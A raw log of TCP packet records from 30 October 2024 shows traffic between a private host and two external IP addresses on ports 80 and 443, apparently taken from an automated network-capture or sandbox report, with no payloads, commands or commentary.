Oct 30, 2024 19:47:06.322550058 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.322566986 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.322582006 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.322597980 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.322612047 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.322628021 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.322627068 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.322668076 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.322668076 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.322668076 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.322923899 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.322938919 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.322952986 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.322967052 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.322968006 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.322978973 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.322983980 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.322990894 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.322999954 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323004007 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323014975 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323021889 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323030949 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323035002 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323049068 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323056936 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323070049 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323085070 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323143959 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323179960 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323211908 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323225975 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323245049 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323259115 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323374033 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323389053 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323402882 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323416948 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323417902 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323431015 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323435068 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323446035 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323460102 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323470116 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323682070 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323704958 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323723078 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323739052 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323803902 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323818922 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323832989 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323841095 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323851109 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323853016 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323868036 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323870897 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323889017 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323892117 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323908091 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323913097 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323925018 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.323926926 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323944092 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.323956966 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324151039 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324172020 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324186087 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324197054 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324202061 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324210882 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324218035 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324227095 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324234009 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324238062 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324249983 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324253082 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324265003 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324269056 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324287891 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324300051 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324409008 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324446917 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324631929 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324646950 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324670076 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324682951 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324800014 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324815035 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324829102 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324840069 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324845076 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324861050 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324865103 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324887037 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324908972 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324924946 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324939013 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324954987 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324963093 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324968100 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.324976921 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.324992895 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.325001955 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.404948950 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.405086994 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.405102968 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.405112982 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.405145884 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.405154943 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.439084053 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.439121008 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.439136982 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.439192057 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.439208031 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.439224005 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.439244986 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.439251900 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.439286947 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.439413071 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.439426899 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.439440966 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.439454079 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.439481020 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.569233894 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.569289923 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.575068951 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.575198889 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.575212002 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.872137070 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:06.872224092 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.885951042 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:06.891484976 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:07.148030996 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:07.148312092 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:07.381558895 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:07.386985064 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:07.619817019 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:07.619846106 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:07.619863033 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:07.620007038 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:07.620007038 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:07.622453928 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:07.627958059 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:07.858901024 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:07.859126091 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:07.874089956 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:07.879553080 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.111810923 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.111891031 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.209654093 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.209794044 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.215172052 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.215197086 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.215209961 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.215221882 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.215230942 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.215238094 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.215275049 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.215281010 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.215326071 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.215399027 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.215435982 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.215449095 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.215449095 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.215487957 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.215560913 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.215600014 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.220365047 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.220400095 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.220412970 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.220413923 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.220424891 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.220443964 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.220470905 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.220491886 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.220504045 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.220518112 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.220545053 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.220545053 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.220571995 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.220598936 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.220621109 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.220648050 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.220673084 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.220705986 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.220736980 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.220748901 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.220774889 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.220779896 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.220818996 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.220832109 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.220875025 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.225641966 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.225703001 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.225725889 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.225781918 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.225800991 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.225847006 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.225872040 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.225888014 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.225908995 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.225914001 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.225920916 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.225935936 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.225958109 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.225971937 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.226042986 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226056099 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226066113 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226070881 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226085901 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.226089954 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226102114 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226113081 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226124048 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226149082 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.226175070 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.226183891 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226196051 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226212978 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226223946 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.226248980 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226253033 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:08.226260900 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226366043 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.226377964 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.230988026 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231069088 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231084108 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231194973 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231208086 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231220007 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231241941 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231252909 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231264114 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231276035 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231301069 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231323004 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231472015 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231484890 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231498003 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231508970 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231519938 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231530905 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231544018 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231555939 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231566906 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231780052 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231795073 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231812000 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231822968 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231844902 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231920004 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231930971 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231945038 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231956959 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231967926 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.231978893 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.848954916 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:08.849131107 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:09.079051018 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:09.084723949 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:09.316293001 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:09.316428900 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:09.364979982 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:09.365015984 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:09.365111113 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:09.376061916 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:09.376077890 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:10.431642056 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:10.431884050 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:10.480376959 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:10.480412960 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:10.480734110 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:10.480797052 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:10.484047890 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:10.527334929 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:10.996644020 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:10.996669054 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:10.996709108 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:10.996876001 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:10.996876001 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:10.996910095 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:10.996973991 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.203769922 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.203783035 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.203821898 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.203855991 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.203890085 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.203902960 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.203924894 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.314490080 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.314512968 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.314843893 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.314877987 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.314937115 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.439165115 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.439203024 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.439435005 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.439476013 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.439519882 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.562963009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.562987089 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.563198090 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.563237906 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.563280106 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.686158895 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.686188936 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.686255932 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.686290026 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.686305046 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.686331034 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.809602022 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.809628010 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.809828997 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.809875011 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.809916019 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.862318993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.862340927 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.862498045 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.862535954 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.862574100 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.984549046 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.984576941 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.984781981 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:11.984818935 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:11.984872103 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.108149052 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.108175993 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.108267069 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.108299971 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.108342886 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.231241941 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.231266975 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.231317043 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.231355906 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.231374025 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.231422901 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:12.330007076 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:12.330034018 CET	443	49731	87.106.236.48	192.168.2.4
